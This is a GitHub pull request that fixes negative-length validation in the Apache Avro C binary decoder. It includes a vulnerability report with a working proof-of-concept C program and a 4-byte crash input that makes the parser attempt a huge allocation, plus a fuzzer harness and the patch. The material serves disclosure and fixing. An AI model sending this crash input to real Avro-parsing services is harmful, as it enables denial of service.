-
Notifications
You must be signed in to change notification settings - Fork 1.7k
[C] Fix negative length validation in binary decoding #3622
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: main
Are you sure you want to change the base?
[C] Fix negative length validation in binary decoding #3622
Conversation
The read_bytes() and read_string() functions in encoding_binary.c
decode length values using zigzag encoding, which can produce negative
numbers from malicious input. These negative values were passed directly
to avro_malloc(), causing allocation failures or undefined behavior.
This patch adds validation to reject negative length values with a
clear error message before attempting memory allocation.
Bug: Negative length values from varint decoding cause
allocation-size-too-big when cast to size_t
Impact: DoS via crafted binary input
Co-Authored-By: Claude <[email protected]>
|
Yes, here is the context of this crash: SummaryNegative string length in Avro binary data causes Version
Steps to ReproduceMethod 1: Using a standalone PoC program (Easiest)Step 1: Build Avro C library with AddressSanitizer: git clone https://github.com/apache/avro.git
cd avro/lang/c
mkdir build && cd build
cmake .. \
-DCMAKE_C_COMPILER=clang \
-DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
make -j$(nproc)Step 2: Create /*
* PoC: Negative string length causes allocation-size-too-big
*
* This demonstrates that any application parsing Avro binary data
* with a map<string> schema can crash from 4 bytes of malicious input.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <avro.h>
int main(void)
{
/*
* Malicious input: 4 bytes that crash read_string()
*
* When parsed as map<string>:
* - 0x01: block count varint, zigzag decode = -1, negated = 1 element
* - 0x00: block size varint = 0
* - 0x2f: string key length varint (47), zigzag decode = -24
* - 0x00: (padding)
*
* read_string() calls avro_malloc(-24 + 1) = avro_malloc(0xFFFFFFFFFFFFFFE9)
*/
uint8_t malicious_data[] = {0x01, 0x00, 0x2f, 0x00};
size_t data_len = sizeof(malicious_data);
const char *schema_json = "{\"type\":\"map\",\"values\":\"string\"}";
printf("[*] PoC: Negative string length vulnerability (read_string)\n");
printf("[*] Schema: %s\n", schema_json);
printf("[*] Malicious input: 01 00 2f 00 (4 bytes)\n");
printf("[*] The byte 0x2f (47) zigzag-decodes to -24\n\n");
avro_schema_t schema;
if (avro_schema_from_json(schema_json, strlen(schema_json), &schema, NULL)) {
fprintf(stderr, "[!] Failed to parse schema: %s\n", avro_strerror());
return 1;
}
avro_reader_t reader = avro_reader_memory((const char *)malicious_data, data_len);
avro_value_iface_t *iface = avro_generic_class_from_schema(schema);
avro_value_t value;
avro_generic_value_new(iface, &value);
printf("[*] Calling avro_value_read()... (this will crash)\n\n");
/* THIS TRIGGERS THE VULNERABILITY */
avro_value_read(reader, &value);
/* Won't reach here */
avro_value_decref(&value);
avro_value_iface_decref(iface);
avro_reader_free(reader);
avro_schema_decref(schema);
return 0;
}Step 3: Build and run the PoC: clang -o poc poc.c \
-I../src \
-L./src -lavro \
-fsanitize=address \
-Wl,-rpath,./src
./pocMethod 2: Using the fuzzerStep 1: Build Avro C library with AddressSanitizer (same as above). Step 2: Save the fuzzer code below as Step 3: Build the fuzzer: clang -g -O1 -fsanitize=address,fuzzer \
-I../src \
value_reader_fuzzer.c \
-L./src -lavro \
-Wl,-rpath,./src \
-o value_reader_fuzzerStep 4: Create PoC input and run: # Create 4-byte malicious input
# First byte 0x34 (52) selects schema index 52 % 20 = 12 = map<string>
# Remaining bytes: 01 00 2f triggers the bug
printf '\x34\x01\x00\x2f' > poc_input.bin
./value_reader_fuzzer poc_input.binExpected BehaviorThe Avro C library should validate that string length is non-negative and return an error for malformed data. Actual BehaviorRoot Cause AnalysisIn static int read_string(avro_reader_t reader, char **s, int64_t *len)
{
int rval;
int64_t str_len = 0;
check_prefix(rval, read_long(reader, &str_len),
"Cannot read string length: ");
*len = str_len + 1; // +1 for null terminator
*s = (char *) avro_malloc(*len); // BUG: str_len can be negative!
...
}Control flow for crash input
Zigzag encoding explanation: Avro uses zigzag encoding for signed integers:
This means byte value Impact
Attack vectors:
Suggested Fix
Add validation for negative length in static int read_string(avro_reader_t reader, char **s, int64_t *len)
{
int rval;
int64_t str_len = 0;
check_prefix(rval, read_long(reader, &str_len),
"Cannot read string length: ");
if (str_len < 0) {
avro_set_error("Invalid string length: %" PRId64, str_len);
return EINVAL;
}
*len = str_len + 1;
*s = (char *) avro_malloc(*len);
...
}Similar validation should be added to FuzzerThis issue was discovered using a custom Avro value reader fuzzer: /*
* Copyright 2026 O2Lab @ Texas A&M University
*
* Fuzzer for Avro C Value Reader
* Target: avro_value_read()
*/
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <avro.h>
/* Predefined schemas for fuzzing */
static const char *SCHEMAS[] = {
/* Primitive types */
"\"null\"",
"\"boolean\"",
"\"int\"",
"\"long\"",
"\"float\"",
"\"double\"",
"\"bytes\"",
"\"string\"",
/* Array types */
"{\"type\": \"array\", \"items\": \"int\"}",
"{\"type\": \"array\", \"items\": \"string\"}",
"{\"type\": \"array\", \"items\": \"bytes\"}",
/* Map types */
"{\"type\": \"map\", \"values\": \"int\"}",
"{\"type\": \"map\", \"values\": \"string\"}",
/* Record types */
"{\"type\": \"record\", \"name\": \"TestRecord\", \"fields\": ["
"{\"name\": \"f1\", \"type\": \"int\"},"
"{\"name\": \"f2\", \"type\": \"string\"}"
"]}",
/* Nested record */
"{\"type\": \"record\", \"name\": \"Outer\", \"fields\": ["
"{\"name\": \"inner\", \"type\": {"
"\"type\": \"record\", \"name\": \"Inner\", \"fields\": ["
"{\"name\": \"value\", \"type\": \"long\"}"
"]"
"}}"
"]}",
/* Enum type */
"{\"type\": \"enum\", \"name\": \"Color\", \"symbols\": [\"RED\", \"GREEN\", \"BLUE\"]}",
/* Fixed type */
"{\"type\": \"fixed\", \"name\": \"Hash\", \"size\": 16}",
/* Union types */
"[\"null\", \"string\"]",
"[\"null\", \"int\", \"long\", \"string\"]",
/* Complex nested type */
"{\"type\": \"record\", \"name\": \"Complex\", \"fields\": ["
"{\"name\": \"id\", \"type\": \"long\"},"
"{\"name\": \"name\", \"type\": [\"null\", \"string\"]},"
"{\"name\": \"tags\", \"type\": {\"type\": \"array\", \"items\": \"string\"}},"
"{\"name\": \"metadata\", \"type\": {\"type\": \"map\", \"values\": \"bytes\"}}"
"]}"
};
static const size_t NUM_SCHEMAS = sizeof(SCHEMAS) / sizeof(SCHEMAS[0]);
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
if (size < 1) {
return 0;
}
/* Use first byte to select schema */
size_t schema_idx = data[0] % NUM_SCHEMAS;
const char *schema_json = SCHEMAS[schema_idx];
const uint8_t *binary_data = data + 1;
size_t binary_size = size - 1;
if (binary_size == 0) {
return 0;
}
avro_schema_t schema = NULL;
avro_value_iface_t *iface = NULL;
avro_value_t value;
avro_reader_t reader = NULL;
int rc;
rc = avro_schema_from_json_length(schema_json, strlen(schema_json), &schema);
if (rc != 0 || schema == NULL) {
return 0;
}
iface = avro_generic_class_from_schema(schema);
if (iface == NULL) {
avro_schema_decref(schema);
return 0;
}
memset(&value, 0, sizeof(value));
rc = avro_generic_value_new(iface, &value);
if (rc != 0) {
avro_value_iface_decref(iface);
avro_schema_decref(schema);
return 0;
}
reader = avro_reader_memory((const char *)binary_data, binary_size);
if (reader == NULL) {
avro_value_decref(&value);
avro_value_iface_decref(iface);
avro_schema_decref(schema);
return 0;
}
/* This is where the vulnerability triggers */
rc = avro_value_read(reader, &value);
(void)rc;
avro_reader_free(reader);
avro_value_decref(&value);
avro_value_iface_decref(iface);
avro_schema_decref(schema);
return 0;
} |
Co-authored-by: Martin Grigorov <[email protected]>
|
@martin-g All changes are done, LMK if you have any concern :) |
Summary
Fix missing validation for negative length values in
read_bytes()andread_string()functions inencoding_binary.c.Problem
The
read_long()function uses zigzag encoding which can decode to negative numbers from malicious input. These negative values were passed directly toavro_malloc(), causing:int64_tis cast tosize_tChanges
len < 0check inread_bytes()before allocationstr_len < 0check inread_string()before allocationEINVALwith descriptive error message on invalid inputTesting
Verified with AddressSanitizer fuzzing - crash no longer reproduces.